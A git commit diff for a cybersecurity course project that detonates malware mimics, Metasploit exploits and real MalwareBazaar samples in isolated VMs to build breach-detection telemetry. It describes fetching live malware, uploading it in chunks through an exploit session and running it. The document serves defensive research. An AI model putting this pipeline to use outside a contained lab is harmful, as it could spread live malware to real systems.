Merge origin/main into Dev_REL1_043026; accept main's service files

Cherry-picks all upstream additions (fleet runner, full collector suite, shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.) and resolves the two service-file conflicts by accepting main's production versions over the stubs we wrote on Day 1.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-30 15:05:51 -06:00 · 7683b64929
commit 7683b64929
parent 86fdd03de4 a61fa05980
71 changed files with 10477 additions and 214 deletions
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -0,0 +1,202 @@
+# AGENTS.md — guidance for AI agents working on this repo
+
+This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
+The conventions below also apply to sibling repos (`wg-enroll`,
+`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
+`openclaw-deploy`).
+
+---
+
+## How a lab host gets to "shipping data" — the canonical bring-up
+
+If you (an AI agent OR a human) are looking at a fresh lab host and
+asking "is this thing actually generating data for the central
+collector?", run this in order. **Cloning the repo by itself does
+nothing. Running launchers from a manual clone bypasses the
+systemd services that do the actual work.**
+
+```sh
+# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
+#    leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
+#    show <usb>` first.
+sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh   # idempotent
+sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
+     <host_id> <wg_ip>           # mints + scp's + extracts + chmods
+
+# 1. (On the lab host.) Install the lab-host role. This copies the
+#    repo into /opt/cis490, builds the venv, drops systemd units,
+#    fetches the Alpine baseline qcow2, and builds the cidata ISO
+#    with the in-guest agent embedded.
+sudo /opt/cis490/scripts/install-lab-host.sh
+# (or, if running from the manual clone:)
+#   sudo ./scripts/install-lab-host.sh
+
+# 2. Edit /etc/cis490/lab-host.toml — set host_id and any overrides.
+
+# 3. Verify everything before enabling the timer-driven services:
+/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
+    --role lab-host
+# → green/yellow rows mean READY; red rows print the exact fix
+#   command. Re-run until clean.
+
+# 4. Turn on the services. From this moment on, the orchestrator runs
+#    one fleet wave on each Restart= cycle, and the shipper picks up
+#    completed episodes and PUTs them to https://collector.wg over mTLS.
+sudo systemctl enable --now cis490-shipper cis490-orchestrator
+
+# 5. (On the Pi.) Watch the index grow:
+sudo tail -f /var/lib/cis490/index.jsonl
+
+# 6. (Optional, Tier 3.) Enable real exploit fire — needs metasploit.
+sudo /opt/cis490/scripts/install-msfrpcd.sh
+# Operator-supplied URL + sha256 (Rapid7 download is registration-walled):
+sudo IMAGE_URL='…' IMAGE_SHA256='…' OUT_DIR=/var/lib/cis490/vm/images \
+    /opt/cis490/scripts/fetch-metasploitable2.sh
+```
+
+If `index.jsonl` doesn't grow within a wave-interval (~60 s after
+`systemctl enable --now`), run `cis490-doctor` again. The most
+common silent failures it catches:
+
+- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
+  one line in `/etc/hosts`)
+- mTLS cert chain not installed under `/etc/cis490/certs/`
+- `cis490-shipper` service inactive (forgot step 4)
+- `qemu-system-x86_64` not on PATH
+
+`cis490-doctor --json` is machine-readable for use by other agents.
+
+## How an agent generates data on demand (without waiting for the timer)
+
+```sh
+# One labeled episode (90 s) with a chosen sample profile:
+sudo -u cis490 /opt/cis490/.venv/bin/python \
+    /opt/cis490/tools/run_real_vm_demo.py \
+    --data-root /var/lib/cis490/data \
+    --sample mirai-class-bot
+
+# Force the shipper to run one pass:
+sudo systemctl start cis490-shipper.service   # (if disabled)
+# or:
+sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
+    --config /etc/cis490/lab-host.toml --once
+
+# Confirm on the Pi:
+ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
+```
+
+Any tool that wants to *count* what's been shipped:
+
+```sh
+ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
+    --index /var/lib/cis490/index.jsonl --count-by host_id'
+```
+
+## Quick test for "is the pipe alive at all"
+
+The `--ping` mode of the shipper does an authenticated POST to
+`/v1/ping` and writes nothing to the database. Use it as the
+smallest E2E test:
+
+```sh
+sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
+    --config /etc/cis490/lab-host.toml --ping
+# {"ok": true, "status_code": 200, ...} on success.
+# Any other status is the operator's signal to read the error string.
+```
+
+---
+
+## File an issue when you hit a problem
+
+**When you run into an issue you cannot fully resolve in the current
+turn, file it as a Forgejo issue on the relevant repo before moving
+on.** Do not silently log a TODO comment, leave a partial workaround,
+or assume someone else will remember. The issue tracker is the
+durable record.
+
+This applies to:
+
+- a build / test / typecheck failure you can't fix in scope
+- a bug you discover but aren't tasked with fixing
+- a missing dep, missing config, or env-only failure that blocks E2E
+- a design gap you've worked around but want a follow-up to fix
+  properly
+- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
+  needs an owner so it doesn't get lost
+
+Don't file an issue when:
+
+- the user is in the conversation and you can just *tell* them
+- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
+- it's truly a non-issue (a one-line edit you're about to make this
+  same turn)
+
+## How to file (Forgejo API)
+
+The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
+token-bearer header:
+
+```sh
+curl -s -X POST \
+  -H "Authorization: token <TOKEN>" \
+  -H "Content-Type: application/json" \
+  http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
+  -d '{
+    "title": "<short, action-oriented title>",
+    "body":  "<context, repro, attempted fixes, suggested next step>"
+  }'
+```
+
+The token comes from the user's session — never embed one in code or
+commits.
+
+### What a good issue body contains
+
+1. **Context** — one sentence on what was being attempted.
+2. **What happened** — the actual error, log line, or unexpected
+   behavior. Paste exact output.
+3. **What was tried** — every workaround you attempted and why it
+   didn't stick.
+4. **Suggested next step** — the smallest change that would resolve
+   it, if you have a guess. "Unknown" is a fine answer.
+5. **Related** — link the commit / PR / file:line where the issue
+   surfaced.
+
+### What a good title looks like
+
+| Bad | Good |
+|---|---|
+| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
+| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
+| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |
+
+## After filing
+
+- Reference the issue number in the next commit message:
+  `Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
+  current change actually fixes it.
+- If the issue is on a different repo than the one you're committing
+  to, fully qualify: `spectral/wg-pki#3`.
+
+## Other conventions
+
+- **Don't put off the hard parts.** Reserve "deferred-with-reason"
+  for genuine blockers (binary not present on this machine, external
+  service unreachable). For anything you *could* do but find awkward
+  — bridge setup, cross-arch quirks, fleet concurrency — do it. The
+  user has flagged this twice when work was scoped down prematurely.
+  When something genuinely is blocked by an operator artifact, file
+  the Forgejo issue and *automate the bring-up* (e.g., installer
+  script + sha256-verifying fetcher) so the moment the artifact lands
+  it Just Works.
+- **Naming:** never coin USB / device / service names on the user's
+  behalf. Ask first. Reusing an old name is especially bad.
+- **`/etc` configs:** `Read` first, copy second. Never overwrite a
+  `/etc/...` file from a template without checking what's actually
+  there.
+- **wg-enroll scope:** creation-only. Don't add admin /
+  service-activation features to it.
+- **Don't expand a project's binary name beyond its own boundary:**
+  `openclaw` is the queue/permissions binary in `openclaw-deploy`.
+  This repo is `wg-enroll` (or its caller). Don't conflate.
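Reviewer sketch (not part of the commit): the "search first, then file" rule in AGENTS.md can be expressed as two request builders and one wrapper. This is a minimal illustration using only the standard library. The base URL, the two endpoints, and the `Authorization: token` header are taken from AGENTS.md; the function names, the `owner` default, and the idea of passing the token in as an argument are assumptions made for the example.

```python
import json
import urllib.parse
import urllib.request

FORGEJO = "http://10.100.0.1:3000"  # base URL quoted in AGENTS.md


def search_request(repo, keyword, token, owner="spectral"):
    """Build the 'search first' GET for open issues matching a keyword."""
    query = urllib.parse.urlencode({"state": "open", "q": keyword})
    url = f"{FORGEJO}/api/v1/repos/{owner}/{repo}/issues?{query}"
    return urllib.request.Request(url, headers={"Authorization": f"token {token}"})


def create_request(repo, title, body, token, owner="spectral"):
    """Build the POST that files a new issue (title + body only)."""
    payload = json.dumps({"title": title, "body": body}).encode("utf-8")
    return urllib.request.Request(
        f"{FORGEJO}/api/v1/repos/{owner}/{repo}/issues",
        data=payload,
        method="POST",
        headers={
            "Authorization": f"token {token}",
            "Content-Type": "application/json",
        },
    )


def file_issue_once(repo, title, body, token, keyword):
    """Hypothetical wrapper: POST only when no open issue matches the keyword.

    Performs network I/O; returns the existing or newly created issue dict.
    """
    with urllib.request.urlopen(search_request(repo, keyword, token)) as resp:
        existing = json.load(resp)
    if existing:
        return existing[0]
    with urllib.request.urlopen(create_request(repo, title, body, token)) as resp:
        return json.load(resp)
```

The token is a plain argument so that it can come from the user's session at call time and never needs to be written into code or commits.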
--- a/README.md
+++ b/README.md
@@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
 watches performance metrics on a real device, decides whether the device has
 been breached, and triggers a hardware-level reset when confidence is high
 enough. This repository covers the **dataset side** — we run public malware
-samples against intentionally vulnerable Linux VMs and capture labeled
-time-series telemetry that mirrors what the deployed model would see in the
-field.
+samples (and behavior-matched mimics) against intentionally vulnerable Linux
+VMs and capture labeled time-series telemetry that mirrors what the deployed
+model would see in the field.
+
+Concretely, every lab host on the WireGuard mesh detects how much capacity
+it has, spins up that many concurrent VMs, gives each VM a *different*
+malware profile from the manifest, and ships the resulting labeled episode
+tarballs to the central receiver on the Pi over mTLS. Running the same
+fleet on multiple hosts gives novel, non-overlapping data per host with no
+coordinator — see [Multi-host fleet](#multi-host-fleet) below.

 The work is grounded in the trust-over-time scoring model from
 [IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
@@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
 sharing a monotonic clock with the metric rows so anything aligned in
 time can be aligned in code.

-### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
+### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*

 This is the closest we get to real-malware behaviour without yet running
 real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
-guest, **and the load is generated inside the guest** by busybox
-``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
-serial console by `tools/vm_load_controller.py`. Every phase transition
-in `labels.jsonl` corresponds to an actual command issued inside the
-real VM.
+guest plus three more sources running concurrently (QMP, bridge pcap,
+in-guest agent — see *Telemetry sources* below). The *load* itself is
+generated inside the guest by a profile-matched shell command from
+[`exploits/workloads.py`](exploits/workloads.py), driven over the
+serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
+
+Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
+dispatches to a different in-session workload, so the envelope each
+VM produces is observably different per family — exactly the variance
+the ML model needs to learn:
+
+| profile          | shape                                                  |
+|------------------|--------------------------------------------------------|
+| `cpu-saturate`   | sustained 1-vCPU saturation (XMRig)                    |
+| `scan-and-dial`  | SYN-style probes across the bridge subnet + dial-home  |
+| `io-walk`        | fs traversal + 4 KiB urandom writes (ransomware)       |
+| `bursty-c2`      | long idle + periodic 3-packet egress burst (Dridex)    |
+| `low-and-slow`   | minimal CPU + periodic memory churn (Kovter / fileless)|
+| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT)|
+
+Every phase transition in `labels.jsonl` corresponds to an actual
+command issued inside the real VM, and `meta.json` records which
+sample / profile / kind drove it.

 ![Real Alpine VM envelope](docs/images/real-vm-envelope.png)

@@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
 infected_running → dormant → infected_running re-entry is the textbook
 envelope that justifies the whole project framing.

-Reproduce with:
+Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
+env, defaults to the v1 yes-loop without one):

 ```sh
-uv run python tools/run_real_vm_demo.py --data-root data
+uv run python tools/run_real_vm_demo.py --data-root data \
+    --sample xmrig-cryptominer
+```
+
+Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
+each slot pulling a different sample from the manifest:
+
+```sh
+uv run python tools/run_fleet.py --capacity            # see what the host can do
+uv run python tools/run_fleet.py --waves 1 --data-root data
 ```

 ### Tier 1 — *real Alpine VM, idle baseline*
@@ -67,14 +102,68 @@ above produces from real KVM behaviour.

 ![Synthetic envelope (host-side mimic)](docs/images/synthetic-envelope.png)

-### What's still missing for the real-malware envelope
+### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
+
+The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
+msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
+[`Sample`](samples/manifest.py) supplied, the driver dispatches the
+post-exploit `infected_running` workload through
+[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
+as Tier 2, so a fleet wave produces matched envelopes whether or not
+an exploit fires. Without a sample, the v1 yes-loop path is preserved
+for smoke runs.
+
+First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
+(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
+sets up `msfrpcd` (loopback only) as a hardened systemd unit;
+[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
+pulls + sha256-verifies a target image from an operator-supplied URL.
+
+### Tier 4 — *real malware sample, fetched + uploaded + executed*
+
+A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
+The driver then bypasses the mimic profile and runs the real-binary
+path:
+
+1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
+   binary from MalwareBazaar (Auth-Key from
+   `samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
+   standard `infected` password, sha-verifies, and lands at
+   `samples/store/<sha256>` (gitignored).
+2. At `infected_running`, the driver chunked-uploads the binary into
+   the shell session as 8 KiB base64 segments
+   (`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
+   work without buffer-busting msfrpc.
+3. The session decodes, sha-verifies *again on the guest side*, chmods,
+   and execs only if the hash matches. Mismatch fail-stops the run.
+4. `meta.sample.sha256` + per-step events
+   (`real_binary_upload_begin`, `real_binary_verify`,
+   `sample_executed{kind=real}`) record exactly which binary was run
+   and when, so trainers can join cleanly.
+
+### Tier maturity

 | Tier | What it gives | Status |
 |---|---|---|
-| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
-| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
-| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
-| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
+| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
+| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
+| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
+| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
+
+### Telemetry sources (all five wire into one episode dir)
+
+| # | Source                         | Vantage       | Role                |
+|---|--------------------------------|---------------|---------------------|
+| 1 | host `/proc/<qemu_pid>`        | outside       | oracle (label only) |
+| 2 | QEMU QMP queries               | outside       | oracle (label only) |
+| 3 | `perf stat -p <qemu_pid>`      | outside       | oracle (label only) |
+| 4 | Bridge pcap → 100 ms netflow   | gateway-side  | feature (deployable)|
+| 5 | In-guest agent (virtio-serial) | inside        | feature (deployable)|
+
+All five are live. The deploy/oracle split follows
+[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
+are usable as model *features* in the field — sources 1, 2, 3 exist
+as labeling oracles only.

 For an interactive view of any episode (zoom/pan/hover), run:

@@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>

 ---

-## Status
+## Status (106/106 tests passing as of `a88ac83`)

- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
+**Pipeline (lab-host → Pi → tarball stored)**
+- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
+- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
+- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
+- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
+- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
+- ✅ Receiver install script (`scripts/install-receiver.sh`)
+- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)

-> **Topology note:** in this project the **Pi5 is the WireGuard-side
-> *collector*** that receives episode tarballs from one or more lab hosts.
-> It is *not* the deployment target for the model. The deployment target is
-> generic ("any constrained Linux device"). See
+**Telemetry**
+- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
+- ✅ Source 2 — QEMU QMP @ 1 Hz
+- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
+- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
+- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
+
+**Orchestrator + drivers**
+- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
+- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
+- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
+- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
+- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
+- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
+- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
+
+**Fleet (multi-VM, multi-host data generation)**
+- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
+- ✅ Concurrent slot runner — `tools/run_fleet.py`
+- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
+
+> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
+> receives episode tarballs from one or more lab hosts. It is *not* the
+> deployment target for the model. The deployment target is generic
+> ("any constrained Linux device"). See
 > [`docs/architecture.md`](docs/architecture.md).

 ---

 <details>
-<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
+<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>

 ```sh
 git clone https://maxgit.wg/spectral/CIS490.git
 cd CIS490
-
-# One-time setup.
 uv sync

-# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
-uv run python tools/run_envelope_demo.py --data-root data
+# 1. Build the cidata ISO with the in-guest agent baked in.
+uv run python tools/build_cidata.py vm/images/cidata.iso

-# Render a static PNG envelope of that episode.
-uv run python tools/plot_envelope.py data/episodes/<episode_id>
+# 2. See what this host is sized for.
+uv run python tools/run_fleet.py --capacity
+# cores: 4 (reserve 1)
+# ram:   7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
+# load:  1m=0.51
+# caps:  by_cores=3, by_ram=13, by_load=3
+# --> max_concurrent VMs: 3

-# Or open an interactive plot in your browser:
+# 3. Run one wave (= max_concurrent parallel episodes, each with a
+#    different sample profile).
+uv run python tools/run_fleet.py --waves 1 --data-root data
+
+# 4. Plot any episode (matplotlib WebAgg).
 tools/show_envelope.sh data/episodes/<episode_id>
 ```

-The data lands in `data/episodes/<ulid>/`:
+Each episode dir contains:

 ```
-meta.json              episode metadata (image, snapshot, schedule, host fingerprint)
-events.jsonl           orchestrator actions (snapshot_load, phase_transition, episode_end)
+meta.json              episode metadata (image, sample, profile, fleet capacity)
+events.jsonl           orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
 labels.jsonl           one row per phase transition — THIS is the envelope
-telemetry-proc.jsonl   host /proc sampler at 10 Hz
+telemetry-proc.jsonl   source 1: host /proc sampler @ 10 Hz
+telemetry-qmp.jsonl    source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
+telemetry-guest.jsonl  source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
+network.pcap           source 4: tcpdump on br-malware
+netflow.jsonl          source 4: 100 ms-bucketed pcap aggregation
 done.marker            written last; the shipper only sees finished episodes
 ```

 </details>

 <details>
-<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
-
-The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
-QMP/monitor sockets and pidfile. The orchestrator then samples the real
-`qemu-system` process.
+<summary><b>Quick start — single episode, no fleet</b></summary>

 ```sh
-# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
-# (See docs/sources.md for the Cirros sha256.)
+# Tier 2 (no exploit, profile-driven workload):
+uv run python tools/run_real_vm_demo.py --data-root data \
+    --sample mirai-class-bot

-# Boot in one terminal:
-RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
-
-# In another terminal, point the orchestrator at the VM's pid:
-QPID=$(cat /tmp/cis490-vm/qemu.pid)
-uv run python -m orchestrator --target-pid $QPID --duration 20
-
-# Plot:
-tools/show_envelope.sh data/episodes/<episode_id>
+# Tier 3 (real exploit fire via msfrpcd):
+MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo "$MSFRPC_PASSWORD") \
+    uv run python tools/run_tier3_demo.py \
+    --module vsftpd_234_backdoor \
+    --sample ransomware-mimic \
+    --data-root data
 ```

-The idle-VM envelope shape is distinct from the synthetic load: periodic
-~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
-late-boot disk write. That's a real KVM guest you're seeing.
+</details>
+
+<details>
+<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
+
+Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
+deterministic walk through the sample catalog:
+
+```python
+# samples/manifest.py (simplified; assumes `from hashlib import sha256`)
+def select(self, *, host_id, slot, episode_index):
+    seed = f"{host_id}|{slot}|{episode_index}".encode()
+    idx  = int.from_bytes(sha256(seed).digest()[:8], "big") % len(self.samples)
+    return self.samples[idx]
+```
+
+So:
+- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
+  pick *different* samples (test asserts < 25% collision over 20 trials).
+- A single host walks the entire catalog within ~`len(manifest)` waves
+  (test confirms full coverage in 200 episodes).
+- No coordinator needed: every host independently walks the catalog in
+  its own order, and `meta.fleet.host_id` + `meta.sample.name` make the
+  join trivial at training time.
+
+The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
+slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
+launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
+range, and episode dir, so concurrency is collision-free up to the
+capacity ceiling.

 </details>

@@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
 | [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
 | [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
 | [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
-| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
-| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
-| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
-| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
-| `tools/` | Demo runners, load mimic, plot scripts |
-| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
-| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
+| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
+| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
+| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
+| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
+| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
+| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
+| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
+| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
+| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
 | `training/` | Model training code (deferred — schema first) |
-| `etc/` | systemd units and config templates installed by the deploy scripts |
+| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
+| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |

 </details>

@@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
  `index.jsonl`. Runs on the Pi5 in our setup.

 ```sh
-# On a lab host:
-./scripts/install-lab-host.sh   # (TODO — currently bring up by hand per docs/deploy.md)
-
 # On the Pi5 (or any always-on WG node):
-./scripts/install-receiver.sh   # (TODO — same)
+sudo ./scripts/install-receiver.sh
+# Add the collector.wg block to spectral/caddy (already merged), then:
+sudo systemctl enable --now cis490-receiver
+
+# One-time, on the Pi: bootstrap the CIS490 client CA.
+sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh
+
+# On each lab host: enroll via wg-enroll first, then:
+sudo ./scripts/install-lab-host.sh
+# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
+sudo systemctl enable --now cis490-shipper cis490-orchestrator
 ```

-For now both bootstrap scripts are scaffolds; the units and configs they
-install live in `etc/`. The receiver itself works today
-(`uv run python -m receiver --config etc/receiver.toml.example` — modify
-paths).
+The orchestrator service runs `tools/run_fleet.py --waves 1` per
+invocation with `Restart=always`, giving a continuous stream of
+fresh-sample episodes per host. The shipper picks them up as
+`done.marker` files appear and PUTs them to `https://collector.wg`.
+
+For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.

 </details>
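Reviewer sketch (not part of the commit): the `--capacity` output quoted in the README's fleet quick start can be reproduced with simple arithmetic. The version below is an illustration, not the code in `orchestrator/fleet.py`. The core and RAM formulas follow directly from the labels in that output (`reserve 1`, `headroom 1024 MiB`, `per-vm 320 MiB`). The load formula is a guess that happens to match the single quoted sample, and every name here is hypothetical.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Capacity:
    by_cores: int
    by_ram: int
    by_load: int

    @property
    def max_concurrent(self) -> int:
        # The tightest of the three caps wins; never report a negative count.
        return max(0, min(self.by_cores, self.by_ram, self.by_load))


def estimate_capacity(
    cores: int,
    ram_available_mib: int,
    load_1m: float,
    reserve_cores: int = 1,
    headroom_mib: int = 1024,
    per_vm_mib: int = 320,
) -> Capacity:
    # Keep `reserve_cores` for the host itself.
    by_cores = cores - reserve_cores
    # Leave `headroom_mib` free, then fit whole VMs into what remains.
    by_ram = (ram_available_mib - headroom_mib) // per_vm_mib
    # ASSUMPTION: cores minus the 1-minute load average, rounded down.
    # The real detector may weigh load differently.
    by_load = math.floor(cores - load_1m)
    return Capacity(by_cores, by_ram, by_load)


if __name__ == "__main__":
    cap = estimate_capacity(cores=4, ram_available_mib=5223, load_1m=0.51)
    print(cap, "max_concurrent =", cap.max_concurrent)
```

With the README's sample host (4 cores, 5223 MiB available, 1-minute load 0.51) this yields caps of 3, 13, and 3, so the host is limited by cores and load rather than RAM.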

--- a/bootstrap/__init__.py
+++ b/bootstrap/__init__.py
--- a/bootstrap/main.py
+++ b/bootstrap/main.py
@@ -0,0 +1,65 @@
+"""``cis490-bootstrap`` launcher.
+
+Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
+behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
+service speaks plain HTTP on loopback only.
+"""
+
+from __future__ import annotations
+
+import argparse
+import logging
+import sys
+from pathlib import Path
+
+import uvicorn
+
+from bootstrap.app import make_app
+
+
+def main(argv: list[str] | None = None) -> int:
+    p = argparse.ArgumentParser(prog="cis490-bootstrap")
